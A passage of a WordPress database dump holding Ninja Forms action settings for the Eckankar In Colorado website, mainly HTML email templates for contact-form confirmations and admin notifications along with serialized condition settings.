/>\r\n<p>Here is a copy of the information that you have submitted:</p><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n<table id=\"emailHeader\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td style=\"background-color: #ebebeb;padding: 10px;border: 1px solid #cccccc\" align=\"left<br /><br />\r\n                                \" valign=\"top\"><br /><br />\r\n<p><span style=\"color: #333333\"><strong>FIRST NAME:</strong> {field:textbox_81}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>LAST NAME:</strong> {field:lastname_82}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>EMAIL:</strong> {field:email_83}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>TELEPHONE:</strong> {field:phone_84}</span><br /><br /><br />\r\n <span style=\"color: #333333\"><strong>LOCAL AREA:</strong> {field:listselect_85}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>PERSON YOU WOULD LIKE TO CONTACT:</strong> {field:select_the_person_you_would_like_to_contact_1613166999137}<br /><br /><br />\r\n <strong>MESSAGE:</strong> {field:textarea_89}<br /><br /><br />\r\n </span></p><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n<tr><br /><br />\r\n<td align=\"center\" valign=\"top\"><br /><br />\r\n<table id=\"emailFooter\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"left\" valign=\"top\"><br /><br />\r\n<p>Your submission will be forwarded to the person that you have selected and you will be contacted soon.</p><br /><br />\r\n<br /><br />\r\nIf you have any questions regarding the origin of this form, please feel free to contact the<br /><br /><br />\r\n Eckankar In Colorado webmaster: webmaster@eckankar-colorado.org<br /><br />\r\n<br /><br />\r\n<p style=\"color: #23507d\"><em>Your Eckankar in Colorado Team<br /><br /><br />\r\n <a href=\"https://www.eckankar-colorado.org\">https://www.eckankar-colorado.org</a></em></p><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n<p> </p>','email_message','<table id=\"bodyTable\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"center\" valign=\"top\"><br /><br />\r\n<table id=\"emailContainer\" border=\"0\" width=\"800\" cellspacing=\"0\" cellpadding=\"0\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"left\" valign=\"top\"><br /><br />\r\n<table id=\"emailHeader\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td style=\"background-color: #ebebeb;padding-left: 10px;color: #23507d;line-height: 80%\" align=\"left<br /><br />\r\n                                \" valign=\"top\"><br /><br />\r\n<h1>Eckankar In Colorado</h1><br /><br />\r\n</td><br /><br />\r\n<td> </td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n<tr><br /><br />\r\n<td align=\"center\" valign=\"top\"><br /><br />\r\n<table id=\"emailBody\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"left\" valign=\"top\"><br /><br />\r\n<p><strong>Hello {field:textbox_81},</strong></p><br /><br />\r\n<p>Thanks for getting in touch! You have created a new form submission on the Eckankar In Colorado website requesting contact with a person on the \"Alamosa Colorado Leadership Communications\" team.</p><br /><br />\r\n<p>Here is a copy of the information that you have submitted:</p><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n<table id=\"emailHeader\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td style=\"background-color: #ebebeb;padding: 10px;border: 1px solid #cccccc\" align=\"left<br /><br />\r\n                                \" valign=\"top\"><br /><br />\r\n<p><span style=\"color: #333333\"><strong>FIRST NAME:</strong> {field:textbox_81}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>LAST NAME:</strong> {field:lastname_82}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>EMAIL:</strong> {field:email_83}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>TELEPHONE:</strong> {field:phone_84}</span><br /><br /><br />\r\n <span style=\"color: #333333\"><strong>LOCAL AREA:</strong> {field:listselect_85}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>PERSON YOU WOULD LIKE TO CONTACT:</strong> {field:select_the_person_you_would_like_to_contact_1613166999137}<br /><br /><br />\r\n <strong>MESSAGE:</strong> {field:textarea_89}<br /><br /><br />\r\n </span></p><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n<tr><br /><br />\r\n<td align=\"center\" valign=\"top\"><br /><br />\r\n<table id=\"emailFooter\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"left\" valign=\"top\"><br /><br />\r\n<p>Your submission will be forwarded to the person that you have selected and you will be contacted soon.</p><br /><br />\r\n<br /><br />\r\nIf you have any questions regarding the origin of this form, please feel free to contact the<br /><br /><br />\r\n Eckankar In Colorado webmaster: webmaster@eckankar-colorado.org<br /><br />\r\n<br /><br />\r\n<p style=\"color: #23507d\"><em>Your Eckankar in Colorado Team<br /><br /><br />\r\n <a href=\"https://www.eckankar-colorado.org\">https://www.eckankar-colorado.org</a></em></p><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n<p> </p>'),(402,18,'attach_csv','0','attach_csv','0'),(403,18,'email_format','html','email_format','html'),(404,18,'reply_to','','reply_to',''),(405,18,'cc','','cc',''),(406,18,'bcc','','bcc',''),(407,18,'redirect_url','','redirect_url',''),(408,18,'success_msg','','success_msg',''),(409,18,'label','Send copy to user','label','Send copy to user'),(410,18,'objectType','Action','objectType','Action'),(411,18,'objectDomain','actions','objectDomain','actions'),(412,18,'editActive','','editActive',''),(413,18,'conditions','a:6:{s:9:\"collapsed\";s:0:\"\";s:7:\"process\";s:1:\"1\";s:9:\"connector\";s:3:\"all\";s:4:\"when\";a:1:{i:0;a:6:{s:9:\"connector\";s:3:\"AND\";s:3:\"key\";s:0:\"\";s:10:\"comparator\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"when\";}}s:4:\"then\";a:1:{i:0;a:5:{s:3:\"key\";s:0:\"\";s:7:\"trigger\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"then\";}}s:4:\"else\";a:0:{}}','conditions','a:6:{s:9:\"collapsed\";s:0:\"\";s:7:\"process\";s:1:\"1\";s:9:\"connector\";s:3:\"all\";s:4:\"when\";a:1:{i:0;a:6:{s:9:\"connector\";s:3:\"AND\";s:3:\"key\";s:0:\"\";s:10:\"comparator\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"when\";}}s:4:\"then\";a:1:{i:0;a:5:{s:3:\"key\";s:0:\"\";s:7:\"trigger\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"then\";}}s:4:\"else\";a:0:{}}'),(414,18,'payment_gateways','','payment_gateways',''),(415,18,'payment_total','0','payment_total','0'),(416,18,'tag','','tag',''),(417,18,'email_message_plain','','email_message_plain',''),(418,18,'parent_id','5','parent_id','5'),(419,19,'title','','title',''),(420,19,'key','','key',''),(421,19,'type','successmessage','type','successmessage'),(422,19,'active','1','active','1'),(423,19,'created_at','2018-01-03 11:43:24','created_at','2018-01-03 11:43:24'),(424,19,'date_updated','2016-01-15','date_updated','2016-01-15'),(425,19,'from_name','','from_name',''),(426,19,'from_address','','from_address',''),(427,19,'to','{wp:admin_email}','to','{wp:admin_email}'),(428,19,'email_subject','Ninja Forms Submission','email_subject','Ninja Forms Submission'),(429,19,'email_message','{fields_table}','email_message','{fields_table}'),(430,19,'attach_csv','0','attach_csv','0'),(431,19,'email_format','html','email_format','html'),(432,19,'reply_to','','reply_to',''),(433,19,'cc','','cc',''),(434,19,'bcc','','bcc',''),(435,19,'redirect_url','','redirect_url',''),(436,19,'success_msg','<div style=\"text-align: center; width: 60%;margin: auto; padding-top: 80px; padding-bottom: 80px\"><span style=\"font-size: 38pt\"><span style=\"color: #23507d\"><strong>Thank You!</strong></span></span><p> <span style=\"font-size: 18pt\">We appreciate you taking the time to communicate with us. You will be contacted soon regarding your submission.</span></p>\n\n\n</div>','success_msg','<div style=\"text-align: center; width: 60%;margin: auto; padding-top: 80px; padding-bottom: 80px\"><span style=\"font-size: 38pt\"><span style=\"color: #23507d\"><strong>Thank You!</strong></span></span><p> <span style=\"font-size: 18pt\">We appreciate you taking the time to communicate with us. You will be contacted soon regarding your submission.</span></p>\n\n\n</div>'),(437,19,'label','Success Message','label','Success Message'),(438,19,'objectType','Action','objectType','Action'),(439,19,'objectDomain','actions','objectDomain','actions'),(440,19,'editActive','','editActive',''),(441,19,'conditions','a:6:{s:9:\"collapsed\";s:0:\"\";s:7:\"process\";s:1:\"1\";s:9:\"connector\";s:3:\"all\";s:4:\"when\";a:1:{i:0;a:6:{s:9:\"connector\";s:3:\"AND\";s:3:\"key\";s:0:\"\";s:10:\"comparator\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"when\";}}s:4:\"then\";a:1:{i:0;a:5:{s:3:\"key\";s:0:\"\";s:7:\"trigger\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"then\";}}s:4:\"else\";a:0:{}}','conditions','a:6:{s:9:\"collapsed\";s:0:\"\";s:7:\"process\";s:1:\"1\";s:9:\"connector\";s:3:\"all\";s:4:\"when\";a:1:{i:0;a:6:{s:9:\"connector\";s:3:\"AND\";s:3:\"key\";s:0:\"\";s:10:\"comparator\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"when\";}}s:4:\"then\";a:1:{i:0;a:5:{s:3:\"key\";s:0:\"\";s:7:\"trigger\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"then\";}}s:4:\"else\";a:0:{}}'),(442,19,'payment_gateways','','payment_gateways',''),(443,19,'payment_total','0','payment_total','0'),(444,19,'tag','','tag',''),(445,19,'email_message_plain','','email_message_plain',''),(446,19,'parent_id','5','parent_id','5'),(447,20,'title','','title',''),(448,20,'key','','key',''),(449,20,'type','email','type','email'),(450,20,'active','1','active','1'),(451,20,'created_at','2018-01-03 11:43:24','created_at','2018-01-03 11:43:24'),(452,20,'date_updated','2016-01-19','date_updated','2016-01-19'),(453,20,'from_name','Alamosa Area Initiators and ESA\'s','from_name','Alamosa Area Initiators and ESA\'s'),(454,20,'from_address','webmaster@eckankar-colorado.org','from_address','webmaster@eckankar-colorado.org'),(455,20,'to','webmaster@eckankar-colorado.org','to','webmaster@eckankar-colorado.org'),(456,20,'email_subject','ECK Colorado Website - Form Record Received','email_subject','ECK Colorado Website - Form Record Received'),(457,20,'email_message','<br><br><br><br><br><br><br><br><br><br><br><br><table id=\"bodyTable\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\"><tbody><tr><td valign=\"top\" align=\"center\"><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><table id=\"emailContainer\" width=\"800\" cellspacing=\"0\" cellpadding=\"10\" border=\"0\"><tbody><tr><td valign=\"top\" align=\"left\"><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><table id=\"emailHeader\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\"><tbody><tr><td style=\"background-color: #ebebeb;padding-left: 10px;color: #23507d;line-height: 80%\" valign=\"top\" align=\"left<br ></td><br />                                \"><br><br><h1>Eckankar In Colorado</h1><br><br></td><td>&nbsp;</td></tr></tbody></table><br><br></td></tr><tr><td valign=\"top\" align=\"center\"><br><br><br><br><br><br><br><br><br><br><br><br><br><br><table id=\"emailBody\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\" border=\"0\"><tbody><tr><td valign=\"top\" align=\"left\"><br><br><p><strong>Hello! You have a new <span style=\"color: #23507d\">Alamosa Initiators and ESAs </span>form submission.<br><br><br> </strong><br><br><br> This form was generated from a user submission on the <em>Eckankar In Colorado</em> website. You are receiving this submission because you are listed as a contact for the <em>Alamosa Colorado Leadership Organization</em>.<br><br><br> <strong><br><br><br>The following person has requested contact with an ECK representative. Here is the information that <span style=\"color: #666666\">{field:textbox_81} {field:lastname_82}</span> has submitted:</strong></p><br><br></td></tr></tbody></table><br><br><br><br><br><br><br><br><br><br><br><br><br><br><table id=\"emailHeader\" width=\"100%\" cellspacing=\"0\" cellpadding=\"20\" border=\"0\"><tbody><tr><td style=\"background-color: #ebebeb;padding: 10px;border: 1px solid #cccccc\" valign=\"top\" align=\"left<br ></td><br />                                \"><br><br><p><span style=\"color: #333333\"><strong>FIRST NAME:</strong> {field:textbox_81}<br><br><br> </span><span style=\"color: #333333\"><strong>LAST NAME:</strong> {field:lastname_82}<br><br><br> </span><span style=\"color: #333333\"><strong>EMAIL:</strong> {field:email_83}<br><br><br> </span><span style=\"color: #333333\"><strong>TELEPHONE:</strong> {field:phone_84}</span><br><br><br> <span style=\"color: #333333\"><strong>LOCAL AREA:</strong> {field:listselect_85}<br><br><br> </span><span style=\"color: #333333\"><strong>PERSON YOU WOULD LIKE TO CONTACT:</strong> {field:select_the_person_you_would_like_to_contact_1613166999137}</span></p><br><br><p><span style=\"color: #333333\"><strong>MESSAGE: </strong>{field:textarea_89}</span></p><br><br></td></tr></tbody></table><br><br></td></tr><tr><td valign=\"top\" align=\"center\"><br><br><br><br><br><br><br><br><br><br><br><br><br><br><table id=\"emailFooter\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\" border=\"0\"><tbody><tr><td valign=\"top\" align=\"left\">If you have any questions regarding the origin of this form, please feel free to contact the Eckankar In Colorado webmaster: webmaster@eckankar-colorado.org<br><br><br><br><p style=\"color: #23507d\"><em>Your Eckankar in Colorado Team<br><br><br> <a href=\"https://www.eckankar-colorado.org\">https://www.eckankar-colorado.org</a></em></p><br><br></td></tr></tbody></table><br><br></td></tr></tbody></table><br><br></td></tr></tbody></table><br><br><p>&nbsp;</p>','email_message','<br><br><br><br><br><br><br><br><br><br><br><br><table id=\"bodyTable\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\"><tbody><tr><td valign=\"top\" align=\"center\"><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><table id=\"emailContainer\" width=\"800\" cellspacing=\"0\" cellpadding=\"10\" border=\"0\"><tbody><tr><td valign=\"top\" align=\"left\"><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><table id=\"emailHeader\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\"><tbody><tr><td style=\"background-color: #ebebeb;padding-left: 10px;color: #23507d;line-height: 80%\" valign=\"top\" align=\"left<br ></td><br />                                \"><br><br><h1>Eckankar In Colorado</h1><br><br></td><td>&nbsp;</td></tr></tbody></table><br><br></td></tr><tr><td valign=\"top\" align=\"center\"><br><br><br><br><br><br><br><br><br><br><br><br><br><br><table id=\"emailBody\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\" border=\"0\"><tbody><tr><td valign=\"top\" align=\"left\"><br><br><p><strong>Hello! You have a new <span style=\"color: #23507d\">Alamosa Initiators and ESAs </span>form submission.<br><br><br> </strong><br><br><br> This form was generated from a user submission on the <em>Eckankar In Colorado</em> website. You are receiving this submission because you are listed as a contact for the <em>Alamosa Colorado Leadership Organization</em>.<br><br><br> <strong><br><br><br>The following person has requested contact with an ECK representative. Here is the information that <span style=\"color: #666666\">{field:textbox_81} {field:lastname_82}</span> has submitted:</strong></p><br><br></td></tr></tbody></table><br><br><br><br><br><br><br><br><br><br><br><br><br><br><table id=\"emailHeader\" width=\"100%\" cellspacing=\"0\" cellpadding=\"20\" border=\"0\"><tbody><tr><td style=\"background-color: #ebebeb;padding: 10px;border: 1px solid #cccccc\" valign=\"top\" align=\"left<br ></td><br />                                \"><br><br><p><span style=\"color: #333333\"><strong>FIRST NAME:</strong> {field:textbox_81}<br><br><br> </span><span style=\"color: #333333\"><strong>LAST NAME:</strong> {field:lastname_82}<br><br><br> </span><span style=\"color: #333333\"><strong>EMAIL:</strong> {field:email_83}<br><br><br> </span><span style=\"color: #333333\"><strong>TELEPHONE:</strong> {field:phone_84}</span><br><br><br> <span style=\"color: #333333\"><strong>LOCAL AREA:</strong> {field:listselect_85}<br><br><br> </span><span style=\"color: #333333\"><strong>PERSON YOU WOULD LIKE TO CONTACT:</strong> {field:select_the_person_you_would_like_to_contact_1613166999137}</span></p><br><br><p><span style=\"color: #333333\"><strong>MESSAGE: </strong>{field:textarea_89}</span></p><br><br></td></tr></tbody></table><br><br></td></tr><tr><td valign=\"top\" align=\"center\"><br><br><br><br><br><br><br><br><br><br><br><br><br><br><table id=\"emailFooter\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\" border=\"0\"><tbody><tr><td valign=\"top\" align=\"left\">If you have any questions regarding the origin of this form, please feel free to contact the Eckankar In Colorado webmaster: webmaster@eckankar-colorado.org<br><br><br><br><p style=\"color: #23507d\"><em>Your Eckankar in Colorado Team<br><br><br> <a href=\"https://www.eckankar-colorado.org\">https://www.eckankar-colorado.org</a></em></p><br><br></td></tr></tbody></table><br><br></td></tr></tbody></table><br><br></td></tr></tbody></table><br><br><p>&nbsp;</p>'),(458,20,'attach_csv','0','attach_csv','0'),(459,20,'email_format','html','email_format','html'),(460,20,'reply_to','','reply_to',''),(461,20,'cc','','cc',''),(462,20,'bcc','','bcc',''),(463,20,'redirect_url','','redirect_url',''),(464,20,'success_msg','','success_msg',''),(465,20,'label','Admin Email','label','Admin Email'),(466,20,'objectType','Action','objectType','Action'),(467,20,'objectDomain','actions','objectDomain','actions'),(468,20,'editActive','','editActive',''),(469,20,'conditions','a:6:{s:9:\"collapsed\";s:0:\"\";s:7:\"process\";s:1:\"1\";s:9:\"connector\";s:3:\"all\";s:4:\"when\";a:1:{i:0;a:6:{s:9:\"connector\";s:3:\"AND\";s:3:\"key\";s:0:\"\";s:10:\"comparator\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"when\";}}s:4:\"then\";a:1:{i:0;a:5:{s:3:\"key\";s:0:\"\";s:7:\"trigger\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"then\";}}s:4:\"else\";a:0:{}}','conditions','a:6:{s:9:\"collapsed\";s:0:\"\";s:7:\"process\";s:1:\"1\";s:9:\"connector\";s:3:\"all\";s:4:\"when\";a:1:{i:0;a:6:{s:9:\"connector\";s:3:\"AND\";s:3:\"key\";s:0:\"\";s:10:\"comparator\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"when\";}}s:4:\"then\";a:1:{i:0;a:5:{s:3:\"key\";s:0:\"\";s:7:\"trigger\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"then\";}}s:4:\"else\";a:0:{}}'),(470,20,'payment_gateways','','payment_gateways',''),(471,20,'payment_total','0','payment_total','0'),(472,20,'tag','','tag',''),(473,20,'email_message_plain','','email_message_plain',''),(474,20,'drawerDisabled','','drawerDisabled',''),(475,20,'parent_id','5','parent_id','5'),(476,21,'title','','title',''),(477,21,'key','','key',''),(478,21,'type','save','type','save'),(479,21,'active','1','active','1'),(480,21,'created_at','2018-01-03 11:43:34','created_at','2018-01-03 11:43:34'),(481,21,'label','Save Form','label','Save Form'),(482,21,'objectType','Action','objectType','Action'),(483,21,'objectDomain','actions','objectDomain','actions'),(484,21,'editActive','','editActive',''),(485,21,'conditions','a:6:{s:9:\"collapsed\";s:0:\"\";s:7:\"process\";s:1:\"1\";s:9:\"connector\";s:3:\"all\";s:4:\"when\";a:1:{i:0;a:6:{s:9:\"connector\";s:3:\"AND\";s:3:\"key\";s:0:\"\";s:10:\"comparator\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"when\";}}s:4:\"then\";a:1:{i:0;a:5:{s:3:\"key\";s:0:\"\";s:7:\"trigger\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"then\";}}s:4:\"else\";a:0:{}}','conditions','a:6:{s:9:\"collapsed\";s:0:\"\";s:7:\"process\";s:1:\"1\";s:9:\"connector\";s:3:\"all\";s:4:\"when\";a:1:{i:0;a:6:{s:9:\"connector\";s:3:\"AND\";s:3:\"key\";s:0:\"\";s:10:\"comparator\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"when\";}}s:4:\"then\";a:1:{i:0;a:5:{s:3:\"key\";s:0:\"\";s:7:\"trigger\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"then\";}}s:4:\"else\";a:0:{}}'),(486,21,'payment_gateways','','payment_gateways',''),(487,21,'payment_total','0','payment_total','0'),(488,21,'tag','','tag',''),(489,21,'to','{wp:admin_email}','to','{wp:admin_email}'),(490,21,'reply_to','','reply_to',''),(491,21,'email_subject','Ninja Forms Submission','email_subject','Ninja Forms Submission'),(492,21,'email_message','{fields_table}','email_message','{fields_table}'),(493,21,'email_message_plain','','email_message_plain',''),(494,21,'from_name','','from_name',''),(495,21,'from_address','','from_address',''),(496,21,'email_format','html','email_format','html'),(497,21,'cc','','cc',''),(498,21,'bcc','','bcc',''),(499,21,'redirect_url','','redirect_url',''),(500,21,'message','This action adds users to WordPress\' personal data export tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.','message','This action adds users to WordPress\' personal data export tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.'),(501,21,'submitter_email','','submitter_email',''),(502,21,'fields-save-toggle','save_all','fields-save-toggle','save_all'),(503,21,'exception_fields','a:0:{}','exception_fields','a:0:{}'),(504,21,'set_subs_to_expire','0','set_subs_to_expire','0'),(505,21,'subs_expire_time','90','subs_expire_time','90'),(506,21,'parent_id','6','parent_id','6'),(507,22,'title','','title',''),(508,22,'key','','key',''),(509,22,'type','email','type','email'),(510,22,'active','1','active','1'),(511,22,'created_at','2018-01-03 11:43:34','created_at','2018-01-03 11:43:34'),(512,22,'date_updated','2016-01-15','date_updated','2016-01-15'),(513,22,'attach_csv','0','attach_csv','0'),(514,22,'email_format','html','email_format','html'),(515,22,'reply_to','','reply_to',''),(516,22,'cc','','cc',''),(517,22,'bcc','','bcc',''),(518,22,'redirect_url','','redirect_url',''),(519,22,'success_msg','','success_msg',''),(520,22,'from_name','Eckankar In Colorado','from_name','Eckankar In Colorado'),(521,22,'from_address','webmaster@eckankar-colorado.org','from_address','webmaster@eckankar-colorado.org'),(522,22,'to','{field:email_96}','to','{field:email_96}'),(523,22,'email_subject','Boulder Area Initiator and ESA Contacts','email_subject','Boulder Area Initiator and ESA Contacts'),(524,22,'email_message','<table id=\"bodyTable\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"center\" valign=\"top\"><br /><br />\r\n<table id=\"emailContainer\" border=\"0\" width=\"800\" cellspacing=\"0\" cellpadding=\"0\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"left\" valign=\"top\"><br /><br />\r\n<table id=\"emailHeader\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td style=\"background-color: #ebebeb;padding-left: 10px;color: #23507d;line-height: 80%\" align=\"left<br /><br />\r\n                                \" valign=\"top\"><br /><br />\r\n<h1>Eckankar In Colorado</h1><br /><br />\r\n</td><br /><br />\r\n<td> </td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n<tr><br /><br />\r\n<td align=\"center\" valign=\"top\"><br /><br />\r\n<table id=\"emailBody\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"left\" valign=\"top\"><br /><br />\r\n<p><strong>Hello {field:textbox_94},</strong></p><br /><br />\r\n<p>Thanks for getting in touch! You have created a new form submission on the Eckankar In Colorado website requesting contact with a person on the Boulder Colorado Leadership Communications team.</p><br /><br />\r\n<p>Here is a copy of the information that you have submitted:</p><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n<table id=\"emailHeader\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td style=\"background-color: #ebebeb;padding: 10px;border: 1px solid #cccccc\" align=\"left<br /><br />\r\n                                \" valign=\"top\"><br /><br />\r\n<p><span style=\"color: #333333\"><strong>FIRST NAME:</strong> {field:textbox_94}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>LAST NAME:</strong> {field:lastname_95}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>EMAIL:</strong> {field:email_96}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>TELEPHONE:</strong> {field:phone_97}</span><br /><br /><br />\r\n <span style=\"color: #333333\"><strong>LOCAL AREA:</strong> {field:listselect_98}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>PERSON YOU WOULD LIKE TO CONTACT:</strong> {field:select_the_person_you_would_like_to_contact_1613167025126}</span></p><br /><br />\r\n<p><span style=\"color: #333333\"><strong>MESSAGE: </strong>{field:textarea_102}</span></p><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n<tr><br /><br />\r\n<td align=\"center\" valign=\"top\"><br /><br />\r\n<table id=\"emailFooter\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"left\" valign=\"top\"><br /><br />\r\n<p>Your submission is being forwarded to the person that you have selected and you will be contacted soon.</p><br /><br />\r\n<br /><br />\r\nIf you have any questions regarding the origin of this form, please feel free to contact the<br /><br /><br />\r\n Eckankar In Colorado webmaster: webmaster@eckankar-colorado.org<br /><br />\r\n<br /><br />\r\n<p style=\"color: #23507d\"><em>Your Eckankar in Colorado Team<br /><br /><br />\r\n <a href=\"https://www.eckankar-colorado.org\">https://www.eckankar-colorado.org</a></em></p><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n<p> </p>','email_message','<table id=\"bodyTable\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"center\" valign=\"top\"><br /><br />\r\n<table id=\"emailContainer\" border=\"0\" width=\"800\" cellspacing=\"0\" cellpadding=\"0\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"left\" valign=\"top\"><br /><br />\r\n<table id=\"emailHeader\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td style=\"background-color: #ebebeb;padding-left: 10px;color: #23507d;line-height: 80%\" align=\"left<br /><br />\r\n                                \" valign=\"top\"><br /><br />\r\n<h1>Eckankar In Colorado</h1><br /><br />\r\n</td><br /><br />\r\n<td> </td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br 